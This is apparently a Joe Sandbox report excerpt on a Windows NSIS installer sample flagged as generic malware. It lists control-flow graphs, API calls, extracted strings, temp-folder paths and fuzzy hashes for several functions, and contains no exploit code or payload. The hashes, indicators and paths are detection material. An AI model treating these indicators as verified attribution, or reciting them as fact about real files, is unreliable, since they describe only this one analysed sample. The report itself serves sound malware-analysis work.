                                                                        control_flow_graph 429 403a3d-403a55 call 406663 432 403a57-403a67 call 4061b5 429->432 433 403a69-403a9a call 40613e 429->433 440 403abd-403ae6 call 403d02 call 405cd7 432->440 438 403ab2-403ab8 lstrcatA 433->438 439 403a9c-403aad call 40613e 433->439 438->440 439->438 447 403aec-403af1 440->447 448 403b6d-403b75 call 405cd7 440->448 447->448 449 403af3-403b17 call 40613e 447->449 454 403b83-403ba8 LoadImageA 448->454 455 403b77-403b7e call 4062ea 448->455 449->448 456 403b19-403b1b 449->456 458 403c29-403c31 call 40140b 454->458 459 403baa-403bda RegisterClassA 454->459 455->454 461 403b2c-403b38 lstrlenA 456->461 462 403b1d-403b2a call 405c14 456->462 471 403c33-403c36 458->471 472 403c3b-403c46 call 403d02 458->472 463 403be0-403c24 SystemParametersInfoA CreateWindowExA 459->463 464 403cf8 459->464 468 403b60-403b68 call 405be9 call 406257 461->468 469 403b3a-403b48 lstrcmpiA 461->469 462->461 463->458 467 403cfa-403d01 464->467 468->448 469->468 470 403b4a-403b54 GetFileAttributesA 469->470 475 403b56-403b58 470->475 476 403b5a-403b5b call 405c30 470->476 471->467 482 403c4c-403c66 ShowWindow call 4065f5 472->482 483 403ccf-403cd0 call 40544a 472->483 475->468 475->476 476->468 490 403c72-403c84 GetClassInfoA 482->490 491 403c68-403c6d call 4065f5 482->491 486 403cd5-403cd7 483->486 488 403cf1-403cf3 call 40140b 486->488 489 403cd9-403cdf 486->489 488->464 489->471 492 403ce5-403cec call 40140b 489->492 495 403c86-403c96 GetClassInfoA RegisterClassA 490->495 496 403c9c-403cbf DialogBoxParamA call 40140b 490->496 491->490 492->471 495->496 499 403cc4-403ccd call 40398d 496->499 499->467
                                                                        APIs
                                                                          • Part of subcall function 00406663: GetModuleHandleA.KERNEL32(?,00000000,?,004034F5,0000000B), ref: 00406675
                                                                          • Part of subcall function 00406663: GetProcAddress.KERNEL32(00000000,?), ref: 00406690
                                                                        • lstrcatA.KERNEL32(1033,Drivelingly Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Drivelingly Setup: Installing,00000000,00000002,774D3410,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe",00000009,0000000B), ref: 00403AB8
                                                                        • lstrlenA.KERNEL32(ExecToStack,?,?,?,ExecToStack,00000000,C:\Users\user\AppData\Local\Temp\Moviedom230,1033,Drivelingly Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Drivelingly Setup: Installing,00000000,00000002,774D3410), ref: 00403B2D
                                                                        • lstrcmpiA.KERNEL32(?,.exe), ref: 00403B40
                                                                        • GetFileAttributesA.KERNEL32(ExecToStack,?,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe",00000009,0000000B), ref: 00403B4B
                                                                        • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\Moviedom230), ref: 00403B94
                                                                          • Part of subcall function 004061B5: wsprintfA.USER32 ref: 004061C2
                                                                        • RegisterClassA.USER32(0042EBC0), ref: 00403BD1
                                                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403BE9
                                                                        • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403C1E
                                                                        • ShowWindow.USER32(00000005,00000000,?,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe",00000009,0000000B), ref: 00403C54
                                                                        • GetClassInfoA.USER32(00000000,RichEdit20A,0042EBC0), ref: 00403C80
                                                                        • GetClassInfoA.USER32(00000000,RichEdit,0042EBC0), ref: 00403C8D
                                                                        • RegisterClassA.USER32(0042EBC0), ref: 00403C96
                                                                        • DialogBoxParamA.USER32(?,00000000,00403DDA,00000000), ref: 00403CB5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                        • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Moviedom230$Control Panel\Desktop\ResourceLocale$Drivelingly Setup: Installing$ExecToStack$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                        • API String ID: 1975747703-1082578815
                                                                        • Opcode ID: 7bc32a605757a0a9e48070d62dcab25d393d6e445afaf259b4bfaf426d6d40e1
                                                                        • Instruction ID: 6db815c1d0a977664f3d39510f8e98c50f9dfcfb4850e4c10674fdff383f0bc2
                                                                        • Opcode Fuzzy Hash: 7bc32a605757a0a9e48070d62dcab25d393d6e445afaf259b4bfaf426d6d40e1
                                                                        • Instruction Fuzzy Hash: C061B9716442046EE620BF669D46F373A7CEB54709F40443FF941B62D3CB7CA9069A2D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00402F0C Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 181memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 503 402f0c-402f5a GetTickCount GetModuleFileNameA call 405dea 506 402f66-402f94 call 406257 call 405c30 call 406257 GetFileSize 503->506 507 402f5c-402f61 503->507 515 402f9a 506->515 516 40307f-40308d call 402ea8 506->516 508 40313c-403140 507->508 518 402f9f-402fb6 515->518 522 4030e2-4030e7 516->522 523 40308f-403092 516->523 520 402fb8 518->520 521 402fba-402fc3 call 403355 518->521 520->521 528 4030e9-4030f1 call 402ea8 521->528 529 402fc9-402fd0 521->529 522->508 525 403094-4030ac call 40336b call 403355 523->525 526 4030b6-4030e0 GlobalAlloc call 40336b call 403143 523->526 525->522 550 4030ae-4030b4 525->550 526->522 554 4030f3-403104 526->554 528->522 532 402fd2-402fe6 call 405da5 529->532 533 40304c-403050 529->533 541 40305a-403060 532->541 552 402fe8-402fef 532->552 540 403052-403059 call 402ea8 533->540 533->541 540->541 543 403062-40306c call 40671a 541->543 544 40306f-403077 541->544 543->544 544->518 553 40307d 544->553 550->522 550->526 552->541 556 402ff1-402ff8 552->556 553->516 557 403106 554->557 558 40310c-403111 554->558 556->541 559 402ffa-403001 556->559 557->558 560 403112-403118 558->560 559->541 561 403003-40300a 559->561 560->560 562 40311a-403135 SetFilePointer call 405da5 560->562 561->541 563 40300c-40302c 561->563 565 40313a 562->565 563->522 566 403032-403036 563->566 565->508 567 403038-40303c 566->567 568 40303e-403046 566->568 567->553 567->568 568->541 569 403048-40304a 568->569 569->541
                                                                        APIs
                                                                        • GetTickCount.KERNEL32 ref: 00402F1D
                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe,00000400,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00402F39
                                                                          • Part of subcall function 00405DEA: GetFileAttributesA.KERNELBASE(00000003,00402F4C,C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe,80000000,00000003,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00405DEE
                                                                          • Part of subcall function 00405DEA: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00405E10
                                                                        • GetFileSize.KERNEL32(00000000,00000000,SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe,C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe,80000000,00000003,?,?,004036FD,?,?,00000007), ref: 00402F85
                                                                        • GlobalAlloc.KERNEL32(00000040,00000007,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 004030BB
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00402F13
                                                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 004030E2
                                                                        • Error launching installer, xrefs: 00402F5C
                                                                        • Null, xrefs: 00403003
                                                                        • C:\Users\user\Desktop, xrefs: 00402F67, 00402F6C, 00402F72
                                                                        • C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe, xrefs: 00402F23, 00402F32, 00402F46, 00402F66
                                                                        • Inst, xrefs: 00402FF1
                                                                        • @TA, xrefs: 00402F9A
                                                                        • "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe", xrefs: 00402F12
                                                                        • soft, xrefs: 00402FFA
                                                                        • SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe, xrefs: 00402F79
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                        • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe"$@TA$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe$soft
                                                                        • API String ID: 2803837635-543604922
                                                                        • Opcode ID: a3529526dccc432a2db2b40383ee9d4975bb57828a7b0874a879935de9d3a064
                                                                        • Instruction ID: 70ffca3bdba6f18ae0426a301ce6e6f0801d42355b595fcaf053b8d4d934ef0e
                                                                        • Opcode Fuzzy Hash: a3529526dccc432a2db2b40383ee9d4975bb57828a7b0874a879935de9d3a064
                                                                        • Instruction Fuzzy Hash: B351D371A01204ABDB20AF64DD85B9B7EBCEB1431AF60813BF500B62D1C7BC9E458B5D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004062EA Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 198stringCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 570 4062ea-4062f5 571 4062f7-406306 570->571 572 406308-40631e 570->572 571->572 573 406512-406516 572->573 574 406324-40632f 572->574 576 406341-40634b 573->576 577 40651c-406526 573->577 574->573 575 406335-40633c 574->575 575->573 576->577 578 406351-406358 576->578 579 406531-406532 577->579 580 406528-40652c call 406257 577->580 581 406505 578->581 582 40635e-406392 578->582 580->579 584 406507-40650d 581->584 585 40650f-406511 581->585 586 4064b2-4064b5 582->586 587 406398-4063a2 582->587 584->573 585->573 590 4064e5-4064e8 586->590 591 4064b7-4064ba 586->591 588 4063a4-4063ad 587->588 589 4063bf 587->589 588->589 594 4063af-4063b2 588->594 597 4063c6-4063cd 589->597 592 4064f6-406503 lstrlenA 590->592 593 4064ea-4064f1 call 4062ea 590->593 595 4064ca-4064d6 call 406257 591->595 596 4064bc-4064c8 call 4061b5 591->596 592->573 593->592 594->589 602 4063b4-4063b7 594->602 606 4064db-4064e1 595->606 596->606 598 4063d2-4063d4 597->598 599 4063cf-4063d1 597->599 604 4063d6-4063f9 call 40613e 598->604 605 40640d-406410 598->605 599->598 602->589 607 4063b9-4063bd 602->607 618 406499-40649d 604->618 619 4063ff-406408 call 4062ea 604->619 611 406420-406423 605->611 612 406412-40641e GetSystemDirectoryA 605->612 606->592 610 4064e3 606->610 607->597 614 4064aa-4064b0 call 406535 610->614 616 406490-406492 611->616 617 406425-406433 GetWindowsDirectoryA 611->617 615 406494-406497 612->615 614->592 615->614 615->618 616->615 620 406435-40643f 616->620 617->616 618->614 623 40649f-4064a5 lstrcatA 618->623 619->615 625 406441-406444 620->625 626 406459-40646f SHGetSpecialFolderLocation 620->626 623->614 625->626 630 406446-40644d 625->630 627 406471-40648b SHGetPathFromIDListA CoTaskMemFree 626->627 628 40648d 626->628 627->615 627->628 628->616 631 406455-406457 630->631 631->615 631->626
                                                                        APIs
                                                                        • GetSystemDirectoryA.KERNEL32(ExecToStack,00000400), ref: 00406418
                                                                        • GetWindowsDirectoryA.KERNEL32(ExecToStack,00000400,?,Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll,00000000,004053B0,Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll,00000000), ref: 0040642B
                                                                        • SHGetSpecialFolderLocation.SHELL32(004053B0,774D23A0,?,Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll,00000000,004053B0,Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll,00000000), ref: 00406467
                                                                        • SHGetPathFromIDListA.SHELL32(774D23A0,ExecToStack), ref: 00406475
                                                                        • CoTaskMemFree.OLE32(774D23A0), ref: 00406481
                                                                        • lstrcatA.KERNEL32(ExecToStack,\Microsoft\Internet Explorer\Quick Launch), ref: 004064A5
                                                                        • lstrlenA.KERNEL32(ExecToStack,?,Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll,00000000,004053B0,Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll,00000000,00000000,00422E48,774D23A0), ref: 004064F7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                        • String ID: ExecToStack$Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll$Software\Microsoft\Windows\CurrentVersion$Y,J$\Microsoft\Internet Explorer\Quick Launch
                                                                        • API String ID: 717251189-2294800890
                                                                        • Opcode ID: 2c5d0b21685c3374f95166384517d31c94890b14ebe00e4cd94493511a12ea34
                                                                        • Instruction ID: b52c447f78294e1834a117c6ffbc2f7508752916544efe1487e33f4ad7b91c7d
                                                                        • Opcode Fuzzy Hash: 2c5d0b21685c3374f95166384517d31c94890b14ebe00e4cd94493511a12ea34
                                                                        • Instruction Fuzzy Hash: 53612270900110AFDF20AF24DD90B7E3BA8AB15318F52403FE903BA2D1C67C99A6DB5D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00401759 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147stringtimeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • lstrcatA.KERNEL32(00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\Temp\Moviedom230\Grnnende,00000000,00000000,00000031), ref: 00401798
                                                                        • CompareFileTime.KERNEL32(-00000014,?,ExecToStack,ExecToStack,00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\Temp\Moviedom230\Grnnende,00000000,00000000,00000031), ref: 004017C2
                                                                          • Part of subcall function 00406257: lstrcpynA.KERNEL32(0000000B,0000000B,00000400,00403556,Drivelingly Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406264
                                                                          • Part of subcall function 00405378: lstrlenA.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll,00000000,00422E48,774D23A0,?,?,?,?,?,?,?,?,?,0040329E,00000000,?), ref: 004053B1
                                                                          • Part of subcall function 00405378: lstrlenA.KERNEL32(0040329E,Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll,00000000,00422E48,774D23A0,?,?,?,?,?,?,?,?,?,0040329E,00000000), ref: 004053C1
                                                                          • Part of subcall function 00405378: lstrcatA.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll,0040329E,0040329E,Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll,00000000,00422E48,774D23A0), ref: 004053D4
                                                                          • Part of subcall function 00405378: SetWindowTextA.USER32(Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll), ref: 004053E6
                                                                          • Part of subcall function 00405378: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040540C
                                                                          • Part of subcall function 00405378: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405426
                                                                          • Part of subcall function 00405378: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405434
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\Moviedom230\Grnnende$C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll$ExecToStack
                                                                        • API String ID: 1941528284-1095074102
                                                                        • Opcode ID: 1a6a60fe252985ba0f1bc75f027b945158fc7094871aab38a13c9e1e0ba7f2b8
                                                                        • Instruction ID: 09a7a28129c88a40a5f98fd7d2104631a28ae03f955191848f4916981dc93f0e
                                                                        • Opcode Fuzzy Hash: 1a6a60fe252985ba0f1bc75f027b945158fc7094871aab38a13c9e1e0ba7f2b8
                                                                        • Instruction Fuzzy Hash: 2E41B572900615BBCB207BB5CD45DAF3679EF05369F60823FF422B20E1D67C8A518A6D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00405378 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73stringwindowCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 768 405378-40538d 769 405443-405447 768->769 770 405393-4053a5 768->770 771 4053b0-4053bc lstrlenA 770->771 772 4053a7-4053ab call 4062ea 770->772 774 4053d9-4053dd 771->774 775 4053be-4053ce lstrlenA 771->775 772->771 777 4053ec-4053f0 774->777 778 4053df-4053e6 SetWindowTextA 774->778 775->769 776 4053d0-4053d4 lstrcatA 775->776 776->774 779 4053f2-405434 SendMessageA * 3 777->779 780 405436-405438 777->780 778->777 779->780 780->769 781 40543a-40543d 780->781 781->769
                                                                        APIs
                                                                        • lstrlenA.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll,00000000,00422E48,774D23A0,?,?,?,?,?,?,?,?,?,0040329E,00000000,?), ref: 004053B1
                                                                        • lstrlenA.KERNEL32(0040329E,Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll,00000000,00422E48,774D23A0,?,?,?,?,?,?,?,?,?,0040329E,00000000), ref: 004053C1
                                                                        • lstrcatA.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll,0040329E,0040329E,Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll,00000000,00422E48,774D23A0), ref: 004053D4
                                                                        • SetWindowTextA.USER32(Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll), ref: 004053E6
                                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040540C
                                                                        • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405426
                                                                        • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405434
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                        • String ID: Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll
                                                                        • API String ID: 2531174081-3501885370
                                                                        • Opcode ID: a928f93debe5d30fd472564f6d7082d98afcf6bac59f3e1af05666e552d28e84
                                                                        • Instruction ID: bfa893c7d30147700316bd172ea6c956eb0bdb6a7275625f57f4f23b87bde493
                                                                        • Opcode Fuzzy Hash: a928f93debe5d30fd472564f6d7082d98afcf6bac59f3e1af05666e552d28e84
                                                                        • Instruction Fuzzy Hash: D7218C71A00518BBDB11AFA5DD84ADFBFB9EF04354F14807AF904B6290C7798E908F98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00403143 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 166COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 782 403143-403157 783 403160-403169 782->783 784 403159 782->784 785 403172-403177 783->785 786 40316b 783->786 784->783 787 403187-403194 call 403355 785->787 788 403179-403182 call 40336b 785->788 786->785 792 403343 787->792 793 40319a-40319e 787->793 788->787 794 403345-403346 792->794 795 4031a4-4031ed GetTickCount 793->795 796 4032ee-4032f0 793->796 799 40334e-403352 794->799 800 4031f3-4031fb 795->800 801 40334b 795->801 797 403330-403333 796->797 798 4032f2-4032f5 796->798 802 403335 797->802 803 403338-403341 call 403355 797->803 798->801 804 4032f7 798->804 805 403200-40320e call 403355 800->805 806 4031fd 800->806 801->799 802->803 803->792 815 403348 803->815 809 4032fa-403300 804->809 805->792 814 403214-40321d 805->814 806->805 812 403302 809->812 813 403304-403312 call 403355 809->813 812->813 813->792 819 403314-403320 call 405e91 813->819 818 403223-403243 call 406788 814->818 815->801 824 4032e6-4032e8 818->824 825 403249-40325c GetTickCount 818->825 826 403322-40332c 819->826 827 4032ea-4032ec 819->827 824->794 828 4032a1-4032a3 825->828 829 40325e-403266 825->829 826->809 830 40332e 826->830 827->794 833 4032a5-4032a9 828->833 834 4032da-4032de 828->834 831 403268-40326c 829->831 832 40326e-403299 MulDiv wsprintfA call 405378 829->832 830->801 831->828 831->832 840 40329e 832->840 837 4032c0-4032cb 833->837 838 4032ab-4032b2 call 405e91 833->838 834->800 835 4032e4 834->835 835->801 839 4032ce-4032d2 837->839 842 4032b7-4032b9 838->842 839->818 843 4032d8 839->843 840->828 842->827 844 4032bb-4032be 842->844 843->801 844->839
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CountTick$wsprintf
